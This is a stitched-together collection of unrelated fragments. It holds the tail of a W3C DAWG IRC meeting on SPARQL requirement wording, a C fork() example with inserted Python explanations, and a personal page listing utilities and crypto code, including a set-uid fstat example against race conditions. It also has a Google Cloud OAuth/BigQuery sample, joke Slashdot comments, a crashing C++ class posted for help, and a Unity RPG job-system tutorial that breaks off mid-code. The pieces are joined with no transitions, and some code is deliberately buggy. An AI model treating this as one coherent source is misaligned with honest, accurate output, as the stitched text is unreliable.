... and 4.5 some way to connect to sources, but more about providing some constraints in how you merge them
15:31:34 [DaveB]
... 4.5 ismore general
15:33:29 [DaveB]
4.2 bigger graphs merge, from
15:33:41 [DaveB]
4.5 dealing with virtual graph exposing multiple sources
15:33:58 [DanC_lap]
(some comments about the shortness of the objectives, inter alia
)
15:35:28 [TomAdams]
TomAdams has joined #dawg
15:38:20 [DaveB]
suggestion to rename 4.2 to "9 Querying the Origin of Statements" from rq23
15:39:28 [DanC_lap]
kc: ammendment: s/Origin/Source/
15:42:18 [DaveB]
rdf repositories - data from multiple sources
15:43:35 [DaveB]
proposal to swap 4.2/4.5 titles
15:43:45 [Yoshio]
Hmm, ambiguous
15:43:51 [DanC_lap]
PROPOSED: "4.2 Querying Multiple Sources ... which of the available rdf graphs ..."
15:44:20 [Yoshio]
Querying Multiple Sources could be read as "Querying to Multiple Sources", no?
15:45:41 [DanC_lap]
PROPOSED: "4.2 Querying Multiple Sources ... which of the available rdf graphs ..." and "4.5 Querying the origin of triples ... can be used for data integration and aggregation ..."
15:46:41 [Yoshio]
Why do we need "Multiple" then?
15:46:48 [Yoshio]
in 4.2
15:47:00 [DanC_lap]
multiple as opposed to one
15:47:13 [Yoshio]
but what we get is one source
15:47:26 [ericP]
from multiple sources
15:47:33 [DanC_lap]
no, I read "which of the available rdf graphs" plural
15:47:34 [Yoshio]
(^_^;)
15:48:03 [Yoshio]
Hmm, English is difficult
15:49:32 [rob]
4.2 Querying Multiple Sources
15:49:33 [rob].
15:49:58 [rob]
4.5 Querying the origin of statements
15:49:59 [rob]
RDF can be used for data integration and aggregation. RDF repositories are built by merging RDF triples from several other RDF repositories or from non-RDF sources converted to RDF. Such an aggregations can be real or virtual.
15:49:59 [rob]
It must be possible for the query language and protocol to allow an RDF repository to expose the source from which a query server collected a triple or subgraph.
15:50:51 [DanC_lap]
-----------
15:52:06 [kendallc]
4.2 Querying Multiple Sources
15:52:06 [kendallc]
RDF can be used for data integration and aggregation. RDF repositories
15:52:06 [kendallc]
are built by merging RDF triples from several other RDF repositories
15:52:06 [kendallc]
or from non-RDF sources converted to RDF. Such an aggregations can be
15:52:06 [kendallc]
real or virtual.
15:52:09 [kendallc]
It must be possible for the query language and protocol to allow an
15:52:11 [kendallc]
RDF repository to expose the source from which a query server
15:52:14 [kendallc]
collected a triple or subgraph.
15:52:16 [kendallc]
4.5 Querying the Origins of Statements
15:52:19 [kendallc]
It should be possible for a query to specify which of the available
15:52:21 [kendallc]
RDF graphs it is to be executed against. If more than one RDF graph is
15:52:24 [kendallc]
specified, the result is as if the query had been executed against the
15:52:26 [kendallc]
merge of the specified RDF graphs. Some services may allow queries
15:52:29 [kendallc]
against only one graph; they are considered to trivially satisfy this
15:52:31 [kendallc]
objective.
15:52:34 [kendallc]
While a variety of use cases motivate this feature, one reason it
15:52:36 [kendallc]
isn't a requirement is that it's not clear whether it can be
15:52:39 [kendallc]
implemented in a generally scalable fashion.
15:52:43 [DanC_lap]
]]
15:54:30 [dirkx]
It should be possible for a query to specify against which triples it must be executed based on the source of that triple as defined in 4.2
15:57:18 [dirkx]
4.2 Data Integration and Aggregation
15:57:19 [dirkx]
...
15:57:24 [dirkx]
4.2.1 - Querying multiple sources
15:57:25 [dirkx]
...
15:57:30 [dirkx]
4.2.2 Querying based on Source
15:57:31 [dirkx]
...
15:59:16 [kendallc]
4.2 RDF Aggregation and Querying the Origins of Statements
15:59:16 [kendallc]
RDF can be used for data integration and aggregation. RDF repositories
15:59:16 [kendallc]
are built by merging RDF triples from several other RDF repositories
15:59:16 [kendallc]
or from non-RDF sources converted to RDF. Such an aggregations can be
15:59:16 [kendallc]
real or virtual.
15:59:18 [kendallc]
It must be possible for the query language and protocol to allow an
15:59:21 [kendallc]
RDF repository to expose the source from which a query server
15:59:23 [kendallc]
collected a triple or subgraph. It must also be possible for a query
15:59:26 [kendallc]
to specify which of the available RDF graphs it is to be executed
15:59:28 [kendallc]
against. If more than one RDF graph is specified, the result is as if
15:59:31 [kendallc]
the query had been executed against the merge of the specified RDF
15:59:33 [kendallc]
graphs. Some services may allow queries against only one graph; they
15:59:36 [kendallc]
are considered to trivially satisfy this objective.
15:59:48 [DanC_lap]
]]
16:00:42 [dirkx]
4.2 data integration and aggregation
16:01:04 [dirkx]
4.2 data integration and aggregation
16:01:11 [dirkx]
4.2 data integration and aggregation
16:01:18 [dirkx]
RDF can be used for data integration and aggregation. RDF repositories
16:03:00 [ericP]
If more than one RDF graph is specified, the query is executed against the merge of the specified RDF graphs.
16:03:41 [ericP]
replacing "If more than one RDF graph is specified, the result is as if the query had been executed against the merge of the specified RDF graphs."
16:03:53 [dirkx]
dirkx has joined #dawg
16:08:38 [AlbertoR]
dirkx proposed wording
16:09:28 [rob]
It must be possible for queries to ask for data from multiple
16:09:34 [rob]
rdf sources.
16:09:37 [dirkx]
dirkx has joined #dawg
16:09:45 [rob]
It must be possible to query the origin of statements.
16:10:24 [Yoshio]
Dirk? what's the difference between 4.2.1 and 4.2.3?
16:10:49 [DaveB]
a repository can have multiple sources; there can be multiple sources with multiple repositories
16:11:01 [ericP]
(query Q1 on A) U (query Q1 on B)
16:11:11 [ericP]
query Q1 on (A U B)
16:11:16 [dirkx]
Andy brings up a good point; the Origin Server problem versus the Server problem
16:11:55 [dirkx]
And that is not clear if you do not already have the pre-conveived idea
16:13:24 [DaveB]
AndyS - don't like 4.2.1 distributed query implication
16:14:52 [DaveB]
Kendall would change "to expose the source from which that query server collected " to remove the specificity
16:20:26 [ericP]
s/listed in/expressed in/
16:24:54 [DaveB]
considering a replacement for 4.2&4.5 being composed in email
16:25:58 [DaveB]
vote
16:26:02 [DaveB]
objection RobS
16:26:08 [DaveB]
abstain SteveH
16:26:14 [DaveB]
on email yet to be sent ... hold on
16:26:49 [DaveB]
DECIDED
16:27:00 [Yoshio]
re: inserting "over" +1 to Andy --- representing non-natives :)
16:27:02 [DaveB]
words in
16:27:10 [DaveB]
^- are the decided words
16:27:34 [DaveB]
kendall has editorial action to do wordmunging
16:28:32 [DaveB]
move to adjourn
16:28:36 [DaveB]
ADJOURNED
16:28:38 [DanC_lap]
ADJOURN.
16:28:43 [danbri_dna]
congrats ;)
16:54:40 [AndyS]
AndyS has joined #dawg
16:55:45 [afs]
afs has joined #dawg
16:56:10 [afs_]
afs_ has joined #dawg
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int x;
int y;

int main(void)
{
    pid_t pid;

    if ((pid = fork()) < 0) {
        perror("Fork error");
        exit(1);
    } else if (pid == 0) {              /* child */
        if (x == 0)
            y = x + 1;
        else
            y = 5;
        printf("child: x = %d y = %d\n", x, y);
    } else {                            /* parent */
        if (y == 0)
            x = y + 1;
        else
            x = 5;
        printf("parent: x = %d y = %d\n", x, y);
    }
    exit(0);
}
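The question the thread is driving at — whether globals are shared across fork() — has the answer no: after the fork, parent and child each have their own copy of every global (copy-on-write). A quick sketch in Python, which wraps the same POSIX call, makes this observable; the pipe is just a way for the child to report its value back to the parent:

```python
import os

x = 0  # module-level "global", like the C example's x

def demo():
    """Fork; the child rewrites the global, the parent's copy is untouched."""
    global x
    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:                        # child: has its own copy of x
        os.close(r)
        x = 99                          # only the child's copy changes
        os.write(w, str(x).encode())
        os._exit(0)
    os.close(w)                         # parent
    child_x = int(os.read(r, 16))
    os.waitpid(pid, 0)
    return x, child_x

parent_x, child_x = demo()
print(parent_x, child_x)                # 0 99 — the child's write never reached the parent
```

The same reasoning explains the C program above: only one of `x`/`y` is set in each process, and neither process ever sees the other's assignment.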
[up one level]
$ cat categories
$ _
jam.vim is some pretty syntax highlighting I made for bjam aka Boost.Jam aka Boost.Build aka what-the-hell-do-I-call-this-thing? Anyway, it's an alternative to make, a lot more powerful, and a lot simpler to use. I based this off of something from a certain Matt Armstrong that I found on some mailing list.
sys_fstream.hpp (20090309) is a reimplementation of C++'s
<fstream> so that I could get at the file descriptor if I needed it.
So if you want to open a file before calling
fstat(2), but still want to use C++'s I/O, you can.
You can even construct the object using the file descriptor or
FILE* pointer.
Obviously, since standard C++ I/O uses buffers, as does C I/O, it's a bad idea to use the file descriptors or
FILE* pointers for I/O unless you promise to flush buffers before switching to a different I/O system (ostreams only).
One usage example is if the following were running set-uid root, the user wouldn't be able to dump
/etc/shadow by exploiting a race condition:
#include <iostream>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include "sys_fstream.hpp"

int main(int argc, char **argv)
{
    if (argc < 2) {
        std::cerr << "need arg\n";
        return 1;
    }

    std::extra::sys_ifstream in(argv[1]);
    if (!in) {
        std::cerr << "failed to open\n";
        return 1;
    }

    struct stat st;
    fstat(in.fd(), &st);
    uid_t uid = getuid();
    if (uid && uid != st.st_uid) {
        // don't bother checking gids in this example
        std::cerr << "you don't have permission\n";
        in.close();
        return 1;
    }

    std::cout << "access granted:\n=============\n";
    std::string line;
    while (std::getline(in, line))
        std::cout << line << '\n';
    return 0;
}
fibheap.hpp (20091119) An implementation of the Fibonacci heap as described in Cormen et al., with a superset of STL's
std::priority_queue's operations (the new functions being
pop(pointer) and
decrease(pointer, key)).
The only deficiencies are that the copy constructor does not keep the old heap structure (the complexity is the same, but there is some wasted work), and there is no merge operation.
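The two operations beyond std::priority_queue's interface — pop(pointer) and decrease(pointer, key) — are the interesting part of a Fibonacci heap. The same interface can be approximated on an ordinary binary heap with the standard lazy-invalidation trick; here is a sketch of that idea in Python (not the Fibonacci-heap algorithm itself — decrease here costs O(log n) amortized rather than the Fibonacci heap's O(1)):

```python
import heapq
import itertools

class DecreasablePQ:
    """Min-priority queue with decrease-key, via invalidating stale entries."""
    def __init__(self):
        self._heap = []
        self._entries = {}              # item -> its live heap entry
        self._counter = itertools.count()

    def push(self, item, key):
        entry = [key, next(self._counter), item, True]   # True = entry is live
        self._entries[item] = entry
        heapq.heappush(self._heap, entry)

    def decrease(self, item, key):
        old = self._entries[item]
        assert key <= old[0], "decrease-key must not increase the key"
        old[3] = False                  # mark the stale entry dead, leave it in place
        self.push(item, key)            # re-insert with the smaller key

    def pop(self):
        while self._heap:
            key, _, item, live = heapq.heappop(self._heap)
            if live:                    # skip entries killed by decrease()
                del self._entries[item]
                return item, key
        raise IndexError("pop from empty queue")

pq = DecreasablePQ()
pq.push("a", 10)
pq.push("b", 5)
pq.decrease("a", 1)
print(pq.pop())   # ('a', 1)
```

The dead entries are garbage-collected as they bubble out of the heap, which keeps each operation logarithmic in the number of pushes.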
redblack.hpp (20091110) An implementation of Red-black trees as described in Cormen et al., with an almost identical interface as STL's
std::multimap.
I totally needed this for computational geometry, but couldn't get it working.
All of that has changed today, my friends.
So … I hope it works.
I have (disabled) consistency checks implemented that went quiet a while ago, so it really should be fine.
fluks is my implementation of the LUKS (Linux Unified Key Setup) standard. With LUKS there is a master key, used to encrypt a disk partition, and this master key is encrypted in the LUKS header with a much simpler password. I use this on my desktop system. This is the largest thing I have ever written.
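The two-level key scheme described — a random master key encrypts the partition, and the password only ever encrypts the master key, so the password can be changed without re-encrypting the disk — can be sketched as follows. This is illustrative only: real LUKS uses PBKDF2 with a benchmarked iteration count plus anti-forensic key splitting, and a real block cipher where the hash-stream XOR below is a toy stand-in.

```python
import hashlib
import os

def kdf(password: bytes, salt: bytes, length: int = 32) -> bytes:
    # Password -> key, as LUKS does with PBKDF2 (iteration count illustrative).
    return hashlib.pbkdf2_hmac("sha256", password, salt, 100_000, dklen=length)

def xor_stream(key: bytes, data: bytes) -> bytes:
    # Toy stand-in for the cipher that encrypts the master key in a key slot.
    stream = hashlib.sha256(key).digest()
    while len(stream) < len(data):
        stream += hashlib.sha256(stream).digest()
    return bytes(a ^ b for a, b in zip(data, stream))

# Header creation: wrap a random master key under a password-derived key.
salt = os.urandom(16)
master_key = os.urandom(32)                      # this key encrypts the partition
slot = xor_stream(kdf(b"hunter2", salt), master_key)

# Unlocking: the password only ever decrypts the master key.
recovered = xor_stream(kdf(b"hunter2", salt), slot)
assert recovered == master_key
```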
Included in fluks is a C99 implementation of CAST6 or CAST-256, described in RFC 2612. It is licensed with ISC and is therefore the only unencumbered C implementation that I know of. I won't call this optimized, but you'd be hard-pressed to make it much faster, I bet. CAST-256 was not an AES finalist.
There's also a C99 implementation of the Tiger hash, using the OpenSSL-style init(), update(), end() interface. License: ISC. The reference version had no update() procedure. Mine is also heavily annotated. I should note that it hasn't been tested on big-endian systems, but I have faith that it will work. The Tiger hash is designed to run well on 64-bit systems.
It is also the home of an independent Serpent implementation, written in C++ (for the references) and accessible to C (at minimum, link with
libsupc++).
License: ISC.
It is generally efficient as it uses bitslicing (with very short S-box functions), but I haven't benchmarked it.
There is a faster, GPL-encumbered version, but it relies on superscalars and CISC architectures.
Serpent was an AES finalist, edged out by Rijndael because it was harder/slower to implement.
It is more secure, though (as far as anybody really knows), if only because it runs slower.
Let's see, what else? I optimized the reference implementation of the Whirlpool hash, and it's now C99 with zero macros. It no longer allows hashing of partial bytes of data. The alignment issues involved are just too much.
javascrypto is a Javascript implementation of several ciphers (just Serpent), hash functions (Tiger and Whirlpool), HMAC (hashed MAC), PBKDF2 (password-based key derivation function), and CTR encryption. Please don't ignore the fact that you cannot trust unsigned crypto implementations, especially over the internets. Who knows what's changed? I only wrote all this for my email page.
flacsplit Splits a FLAC or WAVE file based off a corresponding CUE sheet, compressing the output to FLAC and tagging it from the CUE sheet values. It does everything in memory, saving a lot in I/O costs, so it's fast.
I wrote a guide on installing Folding at Home in OpenBSD. You might be able to use Newton's method to find an approximation of the steps for another platform.
strftime.js strftime(3) in Javascript. 8.4 kB plain, 3.7 kB minified. I haven't tested the week logic, but it seems good!
ntg9.tar.gz There may have been a way to generate this, but … anyway … I wanted to use the
artikel3 document class in LaTeX, but I wanted the font size to be 9 point.
I basically copied the sizes from the
extarticle's
size9.clo file and … sort of interpolated between ntg's
ntg12.clo,
ntg11.clo, and
ntg10.clo files.
I haven't the foggiest how it works.
smallworld.tar.xz (not a utility).
I got really frustrated by a certain puzzle from Facebook's job puzzles.
The test code for it is really screwy.
I.e. they contrived tests that would not work for implementations using
floats.
Now that's not memory efficient, which is what they wanted.
Well out of protest for this screwy puzzle, I'm posting my code.
I licensed it under MIT.
Successful evaluations get sent to the Facebook people, so they should see my name in it if you submit it legally :).
I now know that it can be solved in O(n lg n) time using an algorithm involving Delaunay triangles.
sudoku.tar.xz (20091123) A sudoku solver I wrote for 9x9 and 16x16 puzzles. It's the only way I'll ever have the patience to solve a 16x16 sudoku. I did it once for real, and that was enough. I pronounce it soo-DOCK-oo.
I run OpenBSD-current, and I hate maintaining it. These make my life loads easier.
clean-tree.c (20090607) is a utility that I place in
/usr/ports to remove all of the w-* directories, used to build packages.
It is obsolete now that ports puts everything in /usr/ports/obj.
This couldn't be written as a shell script since using
find would traverse the w-* directories, even though I don't care what's in there.
So, it was down to Python or C (I didn't yet know Perl).
For the challenge, I chose C.
To build it, just
cd to the directory with it and type
CFLAGS="$CFLAGS -std=c99" make clean-tree.
cvs-update (20080901) is a Python script that updates the CVS repositories.
It also rebuilds
/usr/ports/INDEX, which is a necessary step when using
build-world below.
It should be configured by editing the variables near the top.
build-world-20100128.tar.xz is a program in Perl that builds all packages from a file called 'world'.
Each line of 'world' is a package name, possibly with a partial version (e.g. gkrellm, jdk-1.7).
When you give it a
--update argument, it will rebuild all packages that have updates.
Also with
--update, if the version has increased for a package (not the OpenBSD patch number), anything depending on it will be rebuilt.
In the future, I will add support for setting
FLAVOR in the 'world' file.
Right now, I'm just setting
FLAVOR at the top of the port Makefiles.
Sloppy, I know.
As a side-note, I rewrote this in Python for fun.
It used fewer lines, but that's probably because there weren't any lines with a lone closing brace, as is common in Perl.
Also, every line was longer, so it ended up being bigger.
It executed a second faster in the
--pretend mode (5 vs 6).
It was also much clearer, since Python has a primarily object-oriented API where Perl's is procedural.
Here are two patches I wrote for publicfile, a simple and secure http/ftp server from D. J. Bernstein. Also see the unofficial site for other patches.
publicfile-0.52-sorted.patch sorts the ftp listings before they're sent out.
It uses a binary search tree, because that's what I wanted to write.
20091123 Changed formatting (OpenBSD KNF!), and made the implementation not stupid-complicated, and a little faster, I'm sure.
publicfile-0.52-allowspace.patch allows spaces to appear in filenames.
I cannot think of any reason not to, and it is possibly a bug in DJB's code.
It's doubtful, but the only fix I needed for allowing spaces was the difference between
< and
<=.
Now I usually frown on spaces within filenames, but with my music collection, I make an exception.
Did I just say I have my music files hosted with FTP on my various computers?
No, I clearly did not say that.
bestzip.tar.xz compresses a file with gzip and lzma, and keeps whichever gave better compression.
I ran this in the directory where I keep my Windows software on my fileserver and saved probably 100MB.
Written in C++, boost for the
program_options library and the
scoped_array type, and SUSv3 for
exec (mainly).
Also requires gzip and lzma-utils.
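The idea — compress with both algorithms and keep whichever output is smaller — is easy to sketch, here using Python's gzip and lzma modules rather than shelling out to the external tools the original uses:

```python
import gzip
import lzma

def best_compress(data: bytes):
    """Return (method, blob) for whichever of gzip/lzma compresses `data` smaller."""
    candidates = {
        "gzip": gzip.compress(data, compresslevel=9),
        "lzma": lzma.compress(data, preset=9),
    }
    method = min(candidates, key=lambda m: len(candidates[m]))
    return method, candidates[method]

method, blob = best_compress(b"abc" * 10_000)
print(method, len(blob))
```

Either way the winner is kept and the loser discarded, so the only cost over single-algorithm compression is the extra CPU time of running both.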
dirsize-20100314.tar.xz recursively sums the sizes and contained sizes of all arguments.
Written in C++ with boost for the
filesystem library, so it's totally cross-platform :).
rescue-20090202.tar.xz is a tool that I developed to recover from a catastrophic loss of data. The lovely Linux developers developed ext4 for years. One day, they announce, 'it's stable!' So I threw caution to the wind and made the switch. Biggest mistake ever. At some point, the root directory was erased (as in, size = 0). Other problems I encountered along the way: the group descriptor table is gone, so I wrote a program to guess, for each group, what block the inodes started at (powers of 3, 5, and 7 are different from the others); I can't seem to find any inodes in the first group; and the ext4 documentation == code.
So, I set out on a quest to recover my data from the evil clutches of ext4, armed with nothing but cygwin, vim, hexedit, python, C, and my wits.
This is the culmination of all my ext4 knowledge.
Although not perfect, it got all 23 GB of my data back at a stellar 1 MB/s (I figure if I had made the I/O asynchronous, it would have been quicker).
Also, the program writes a log that contains the permissions of all files, as well as the symbolic links, since none of this can be done with FAT32 filesystems.
There is a tool called
run_log that will process the log, applying the permissions and recreating the symlinks.
Written in C99 for little-endian systems (I'm not sure how extfs behaves on big-endian systems).
I now use XFS.
multicopy.tar.xz copies a file to multiple destinations. Useful when more than one device is involved. Runs at the speed of the slowest device, and relies on the OS for asynchronous writes.
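Reading the source in chunks and fanning each chunk out to every destination — so the source is read only once — can be sketched like this (the demo file names are illustrative):

```python
import os
import tempfile

def multicopy(src_path, dest_paths, chunk_size=1 << 20):
    """Read the source once, writing each chunk to every destination."""
    outs = [open(p, "wb") for p in dest_paths]
    try:
        with open(src_path, "rb") as src:
            while True:
                chunk = src.read(chunk_size)
                if not chunk:
                    break
                for out in outs:
                    out.write(chunk)   # the OS buffers and schedules the actual writes
    finally:
        for out in outs:
            out.close()

# Demo: one source fanned out to two destinations.
d = tempfile.mkdtemp()
src = os.path.join(d, "src.bin")
with open(src, "wb") as f:
    f.write(os.urandom(1 << 20))
dests = [os.path.join(d, "copy1.bin"), os.path.join(d, "copy2.bin")]
multicopy(src, dests)
```

As the original notes, throughput is bounded by the slowest device, since every chunk must be handed to all destinations before the next read.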
[up one level]
Google Cloud provides predefined IAM roles, and you can choose to create custom roles instead. For more information, see Understanding roles and Creating and managing custom roles.
End user authentication example
Complete the following sections to obtain credentials for an end user. The following steps use the BigQuery API, but you can replicate this process with any Google Cloud API that has a client library.
- Enable the BigQuery API.
- Install the BigQuery client libraries.
- If using Python or Node.js, you must install an additional auth library.
Python
Install the oauthlib integration for Google Auth.
pip install --upgrade google-auth-oauthlib
Creating your client credentials.
Save the credentials file to
client_secrets.json. This file must be distributed with your application.
Authenticating and calling the API
Use the client credentials to perform the OAuth 2.0 flow.
Python
from google_auth_oauthlib import flow

# TODO: Uncomment the line below to set the `launch_browser` variable.
# launch_browser = True
#
# The `launch_browser` boolean variable indicates if a local server is used
# as the callback URL in the auth flow. A value of `True` is recommended,
# but a local server does not work if accessing the application remotely,
# such as over SSH or from a remote Jupyter notebook.

appflow = flow.InstalledAppFlow.from_client_secrets_file(
    "client_secrets.json", scopes=[""]
)

if launch_browser:
    appflow.run_local_server()
else:
    appflow.run_console()

credentials = appflow.credentials
Use the authenticated credentials to connect to the BigQuery API.
Python
from google.cloud import bigquery

# TODO: Uncomment the line below to set the `project` variable.
# project = 'user-project-id'
#
# The `project` variable defines the project to be billed for query
# processing. The user must have the bigquery.jobs.create permission on
# this project to run a query. See:
#

client = bigquery.Client(project=project, credentials=credentials)

query_string = """SELECT name, SUM(number) as total
FROM `bigquery-public-data.usa_names.usa_1910_current`
WHERE name = 'William'
GROUP BY name;
"""
query_job = client.query(query_string)

# Print the results.
for row in query_job.result():  # Wait for the job to complete.
    print("{}: {}".format(row["name"], row["total"]))
When you run the sample code, the code launches a browser requesting access to the project associated with the client secrets. The resulting credentials can then be used to access the user's BigQuery resources, because the sample requested the BigQuery scope.
In a different use case, you may wish to
Re:I have to wonder (Score:5, Funny)
aptitude install sun-java6-source
Re:The new Axis of Evil has formed... (Score:5, Funny)
I wonder who will they make Chairman of this MAO group? Actually Steve has the most experience with chairs, so he should probably be the new Chairman MAO.
Google Buy Oracle (Score:3, Funny)
Re:Um, isn't java code GPL? (Score:3, Funny)
from __future__ import braces
Re:You don't know what the fuck you are talking, being correct, complete, and relevant doesn't matter a bit if your opponent has citations. There is no citation more trust-worthy than an obscure blog. Build a library of biased, inflammatory blogs which tend to back your own positions; this is your only defense.
Now go to it! I'll get you started: "A language specification is like an engine schematic. This is the Free World; we don't just give our engine designs away. Remember Volkswagen got its start when Hitler shared specifications... I mean, are you even being serious, or are you just trolling? As you can see in this blog..."
#include <iostream>
#include <cstring>
using namespace std;

class Cow {
    char name[20];
    char * hobby;
    double weight;
public:
    Cow()
    {
        strcpy(name, "peter");
        strcpy(hobby, "nothing");
        weight = 1.0;
    }
    Cow(const char * nm, const char * ho, double wt)
    {
        int len = strlen(ho);
        strncpy(name, nm, 19);
        name[19] = '\0';
        hobby = new char[len + 1];
        strcpy(hobby, ho);
        weight = wt;
    }
    Cow(const Cow & c)
    {
        int len = strlen(c.hobby);
        strcpy(name, c.name);
        hobby = new char[len + 1];
        strcpy(hobby, c.hobby);
        weight = c.weight;
    }
    ~Cow()
    {
        delete [] hobby;
    }
    Cow & operator=(const Cow & c)
    {
        strcpy(name, c.name);
        delete [] hobby;
        hobby = new char[strlen(c.hobby) + 1];
        strcpy(hobby, c.hobby);
        weight = c.weight;
    }
    void ShowCow() const
    {
        cout << "Name: " << name << endl
             << "Hobby: " << hobby << endl
             << "Weight: " << weight << endl;
    }
};

int main()
{
    Cow cow1;
    cow1.ShowCow();
    return 0;
}
Program just crashes, spent time on it, but can't seem to find the problem. Does anyone see the problem?
In this lesson we will show how to define a variety of jobs and store their data as a project asset. Although we have done this before (with conversation assets), this time we will be creating prefabs programmatically. By choosing prefabs over scriptable objects, we have the ability to take advantage of components such as the features which we introduced in the previous lesson.
Reference
Although I have looked at several games, I’ve been spending the most time looking at Final Fantasy Tactics Advance (FFTA). You can find plenty of FAQ’s and guides online which provide a great way to understand the overall scope of the game. For example, there are around 100 different jobs specified by FFTA – each providing a variation on gameplay:
- Stats (some fixed like movement range, others as growth on level up)
- Items (what categories can be equipped)
- Abilities (what can be actively used while operating as that job, what can be learned and used even outside the job)
- Job Tree (learn enough of one job, and there may be a secondary job which opens up to you)
There is a lot of room for complexity here, but a lot of it is really dependent on your own design. Initially, our job system will be limited to determining the starting stats and growth rates of characters, but it shouldn’t be hard to add Job features to control the categories of equippable items and usable skills in much the same way as we added features to items.
Stats
I still like the idea of being able to change jobs and so I see a great reason to define a lot of different job types. We will begin by creating spreadsheets (.csv) which contain data from which to programmatically create our project assets. Of course it’s up to you to determine how you want to organize your data. Do whatever feels the best to you in order for the data to be easy to view and balance.
Here I have created a simple example with three very generic job-types. I used values somewhere within the ranges you might see from FFTA but made it my own custom list. Ideally you will do the same and flesh out many, many more jobs, rather than cheating by directly copying data from Final Fantasy, tempting though it may be. I am starting with two different spreadsheets. The first I call JobStartingStats.csv which I have placed in the Settings folder.
Name,MHP,MMP,ATK,DEF,MAT,MDF,SPD,MOV,JMP
Warrior,43,5,61,89,11,58,100,4,1
Wizard,30,25,11,58,61,89,98,3,2
Rogue,32,13,51,67,51,67,110,5,3
Note that in this case, MOV and JMP are not merely starting stats. They will actually be implemented as StatModifierFeature components so that changing to or from a job will allow the stats to fluctuate up and down.
Next I created a spreadsheet called JobGrowthStats.csv which I also placed in the Settings folder.
Name,MHP,MMP,ATK,DEF,MAT,MDF,SPD
Warrior,8.4,0.8,8.8,9.2,1.1,7.6,1.1
Wizard,6.6,2.2,1.1,7.6,8.8,9.2,0.8
Rogue,7.6,1.1,5.6,8.8,5.6,8.8,1.8
Here I have used a floating point number for each modified stat. However, it is a special convention I saw while referencing the FAQ’s. The whole number portion of the number is a fixed amount of growth in that stat with every level-up. The fractional portion of the number is a percent chance that an additional bonus point will be awarded.
For example, using the two spreadsheets above you can deduce that a character which begins the game as a Warrior will start with 43 hit points. Upon gaining a level this character’s maximum hit points will grow by a minimum of 8 but there is a 40% chance it could grow by 9.
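That convention is easy to sanity-check numerically. Here is a small Python sketch of the same arithmetic the C# LevelUp method performs (grow is a hypothetical helper; Python is used here only because it is convenient to run outside Unity):

```python
import math
import random

def grow(stat_value, growth):
    """One level-up: the integer part is guaranteed, the fraction is a bonus chance."""
    whole = math.floor(growth)
    fraction = growth - whole
    bonus = 1 if random.random() < fraction else 0
    return stat_value + whole + bonus

random.seed(0)
# A Warrior's MHP grows by 8.4 per level: +8 guaranteed, 40% chance of a 9th point.
hp = 43
for _ in range(10):
    hp = grow(hp, 8.4)
print(hp)   # somewhere between 43 + 10*8 = 123 and 43 + 10*9 = 133
```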
Job
Now let’s implement the component which holds the data from our spreadsheets, and which listens to level-ups to actually apply the stat growth, etc. Create a new script called Job in the Scripts/View Model Component/Actor folder.
using UnityEngine;
using System.Collections;

public class Job : MonoBehaviour
{
    #region Fields / Properties
    public static readonly StatTypes[] statOrder = new StatTypes[]
    {
        StatTypes.MHP,
        StatTypes.MMP,
        StatTypes.ATK,
        StatTypes.DEF,
        StatTypes.MAT,
        StatTypes.MDF,
        StatTypes.SPD
    };

    public int[] baseStats = new int[ statOrder.Length ];
    public float[] growStats = new float[ statOrder.Length ];
    Stats stats;
    #endregion

    #region MonoBehaviour
    void OnDestroy ()
    {
        this.RemoveObserver(OnLvlChangeNotification, Stats.DidChangeNotification(StatTypes.LVL));
    }
    #endregion

    #region Public
    public void Employ ()
    {
        stats = gameObject.GetComponentInParent<Stats>();
        this.AddObserver(OnLvlChangeNotification, Stats.DidChangeNotification(StatTypes.LVL), stats);

        Feature[] features = GetComponentsInChildren<Feature>();
        for (int i = 0; i < features.Length; ++i)
            features[i].Activate(gameObject);
    }

    public void UnEmploy ()
    {
        Feature[] features = GetComponentsInChildren<Feature>();
        for (int i = 0; i < features.Length; ++i)
            features[i].Deactivate();

        this.RemoveObserver(OnLvlChangeNotification, Stats.DidChangeNotification(StatTypes.LVL), stats);
        stats = null;
    }

    public void LoadDefaultStats ()
    {
        for (int i = 0; i < statOrder.Length; ++i)
        {
            StatTypes type = statOrder[i];
            stats.SetValue(type, baseStats[i], false);
        }

        stats.SetValue(StatTypes.HP, stats[StatTypes.MHP], false);
        stats.SetValue(StatTypes.MP, stats[StatTypes.MMP], false);
    }
    #endregion

    #region Event Handlers
    protected virtual void OnLvlChangeNotification (object sender, object args)
    {
        int oldValue = (int)args;
        int newValue = stats[StatTypes.LVL];
        for (int i = oldValue; i < newValue; ++i)
            LevelUp();
    }
    #endregion

    #region Private
    void LevelUp ()
    {
        for (int i = 0; i < statOrder.Length; ++i)
        {
            StatTypes type = statOrder[i];
            int whole = Mathf.FloorToInt(growStats[i]);
            float fraction = growStats[i] - whole;

            int value = stats[type];
            value += whole;
            if (UnityEngine.Random.value > (1f - fraction))
                value++;

            stats.SetValue(type, value, false);
        }

        stats.SetValue(StatTypes.HP, stats[StatTypes.MHP], false);
        stats.SetValue(StatTypes.MP, stats[StatTypes.MMP], false);
    }
    #endregion
}
First, I declared an array of StatTypes called statOrder – this will serve as a convenience array to help me parse data from the spreadsheets we created earlier. It is static because it wont change from job to job and this way they can all share.
Next I defined two instance arrays, one for holding the starting stat values, and one for holding the grow stat values. I was able to init them with a length equal to the length of the statOrder array from earlier. I might have decided to implement these as a Dictionary, but because Unity doesn’t serialize Dictionaries I decided to keep it as an Array.
There are three public methods. First is Employ which should be called after instantiating a job and attaching it to an actor’s hierarchy. In this method, we get a reference to the actor’s Stats component so that we can listen to targeted level up notifications as well as apply growth to the other stats in response. In addition, this method will allow any job-based feature to become active.
If you want to switch jobs, you should first UnEmploy any currently active Job. This gives the script a chance to deactivate its features and unregister from level up notifications etc.
When creating a unit for the first time, call LoadDefaultStats so that its stats will be initialized to playable values.
Job Parser
Now it’s time to create a script which can parse our spreadsheets and create project assets from them. Create a new script named JobParser in the Editor folder.
using UnityEngine;
using UnityEditor;
using System;
using System.IO;
using System.Collections;

public static class JobParser
{
    [MenuItem("Pre Production/Parse Jobs")]
    public static void Parse ()
    {
        CreateDirectories();
        ParseStartingStats();
        ParseGrowthStats();
        AssetDatabase.SaveAssets();
        AssetDatabase.Refresh();
    }

    static void CreateDirectories ()
    {
        if (!AssetDatabase.IsValidFolder("Assets/Resources/Jobs"))
            AssetDatabase.CreateFolder("Assets/Resources", "Jobs");
    }

    static void ParseStartingStats ()
    {
